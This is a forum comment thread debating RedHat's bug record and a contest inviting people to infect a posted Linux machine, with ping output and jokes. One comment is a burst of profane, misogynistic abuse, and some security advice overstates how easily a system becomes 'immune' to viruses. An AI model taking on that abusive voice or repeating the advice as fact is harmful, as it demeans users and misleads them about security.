You haven't programmed much have you? (At all? No, patching a C file a couple of times and writing some bash scripts does not count as programming much) Most programmers know that there will be (not might be) bugs in the code. As far as stupid defects, yes they've both had their share. However RedHat is nowhere near Windows in terms of sheer volume of severe bugs. I don't know where you got your data. The last one that I saw was clearly biased (they counted general Linux bugs and RedHat-specific bugs together even though there was significant overlap).
Also note that RedHat uses newer versions of programs than most other Linux distributions. They don't hide this fact. I applaud them for it. Why? Because if they didn't, glibc2 would not have been adopted as quickly as it was. And what about the "broken" compiler that came out with RedHat 7? People railed and hollered because they couldn't compile their kernels. Actually they could, but people conveniently forgot that RedHat posted notices in big letters that they have to use the older version of the compiler to compile (oh no! you have to use kgcc instead of gcc! how will users ever figure that out, especially if RedHat explicitly tells them that they have to). Yes there were bugs in the compiler. It was patched, but the kernel still didn't build. Why not? Because there was code in the kernel that was not compliant with the C99 standard. People's C++ code wouldn't compile anymore. Why? Because a lot of C++ code is plainly incompatible with the ISO98 standard of C++. You know that thing that Slashdotters are always railing about: STANDARDS. Or do you advocate ignoring standards when they don't suit you? Wouldn't that make you like Microsoft? These are standards that were ratified and publicly announced two and three years ago. How can you say that they snuck up on you?
What does C99 give you?
Allocated on the stack so no need for malloc or free (and less corresponding bugs) and basically eliminates the hacks out there to accomplish the same like alloca.
What does ISO98 C++ give you? The Standard Template Library. 'Nuff said.
These are examples, but are indicative of a general trend.
1. New library or suite that is noticeably better comes out
2. RedHat recognizes that it is better, includes it in their distribution, tests, and releases
3. People bitch and moan about how it breaks things that don't come with the distribution
4. Everyone blames RedHat for doing a horrible job
5. Because it is being used, the library in question gets a shakedown and most bugs are worked out quickly
6. People reluctantly fix their programs to work with the updated library/suite so that they can run on RedHat
7. In the course of fixing, people come across the advantages of the new library/suite and herald its arrival
8. People deride the older version
9. People forget it was RedHat that drove the newer, better library/suite into general use
10. Goto 1 because geek memories appear to be very short
If you want a closer-to-perfect RedHat box, install a copy from two versions ago and install all of the associated patches for it. This will be about the equivalent of a standard Debian install: very secure, but quite out of date. If you run Debian unstable or testing, while having more up-to-date software, you find that many of those "stupid defects" find their way into that distribution as well.
- I don't need to go outside, my CRT tan'll do me just fine.
I offer 10$ canadian (or 0.10$ US if you will) to anyone who can infect my box, 24.112.8.23
ping 24.112.8.23
Pinging 24.112.8.23 with 32 bytes of data:
Request timed out.
Request timed out.
Request timed out.
Request timed out.
Ping statistics for 24.112.8.23:
Packets: Sent = 4, Received = 0, Lost = 4 (100% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms
If this were a test for infecting a Windows machine, the contest would already be over and the contest holder would be reinstalling his box right now...
"To make a mistake is only human; to persist in a mistake is idiotic." Cicero
When is the last time you saw a CTO who knew how to use a computer?
:).
I think I've made my point
Hey cunt:
If you plan to tell the world how you think something should be pronounced, take some fucking time to learn the IPA alphabet.
Don't just take a stab at it. You degrade the many who study phonetics with your amateur attempts. Fuck you.
I shit on you.
"...that the hugely successful worm attacks were due to 'tardy' sysadmins."
Uhm, yeah, and 'stupid' MS programmers packaging programs with 'default' options enabled.
When we see that things aren't secure it drives us to improve them.
;)
In this case they aren't criminals, they are participators in a contest.
Imagine where crypto technology would be today if there didn't exist any crackers*.
Imagine what computer security would be today if there didn't exist any hackers*.
Then we might still be using Caesar encryption and run servers on WINDOWS!? boxes
These harmless hackers/crackers drive us to improve security, which stops REAL criminals
*(these words have more than one meaning, in this case I mean 'people who crack codes and ciphers' and 'people who break into computers')
I think I'll stop here.
spaic - sweden
Microsoft exec said yesterday that the hugely successful worm attacks were due to 'tardy' sysadmins.
In other breaking news, tardy sysadmins blame Microsoft for giving them a system which promotes laziness and poor coding standards. One such sysadmin was quoted as saying, "The install wizard didn't tell me that I had to configure anything. What button do I press to get the control panel?" When asked if he preferred emacs or vi, the same sysadmin responded, "Sure, I mean who DOESN'T like Big Macs."
Not only is this comment completely redundant... so too is the whole contest....
Any user who knows what he's doing can secure a system so that it's completely immune to virii. Close all ports so hackers can't get to you, and don't do anything stupid like opening attachments.
Even in Windows... Close all ports (easier than you might think). Use a program like Eudora, Pegasus, or Kaufman Mail Warrior that don't support scripting. Don't open any attachments. Don't download illicit software. Don't visit WAREZ sites. Don't take burns/diskettes from ANY other computer. Hey wow... you've just eliminated every way a virus can get into your system, and you're completely immune to virii. I could offer a billion dollars in Microshaft stock to the first person to infect me with a virus, and it wouldn't mean squat, because I know what I'm doing.
If you believe everything you read, you'd better not read. - Japanese proverb
i walk over to this guy's linux box with a q-tip.
I then wipe the q-tip on the inside of the box.
I then place the q-tip in a growth culture disk, cover it, and wait for mother nature at her finest to bring the big bucks to me.
so, where my 10k lbs? its polytics i tell ya, polytics...
eat your heart out little billy g.
i'd sure hate to be little billy g.'s dog right now...*grin*
Who said anything about Redhat?
Obviously you don't know what you're talking about, If you are concerned with security, you should be using slackware, or maybe debian.
"And we have seen and do testify that the Father sent the Son to be the Savior of the World"
1 John 4:14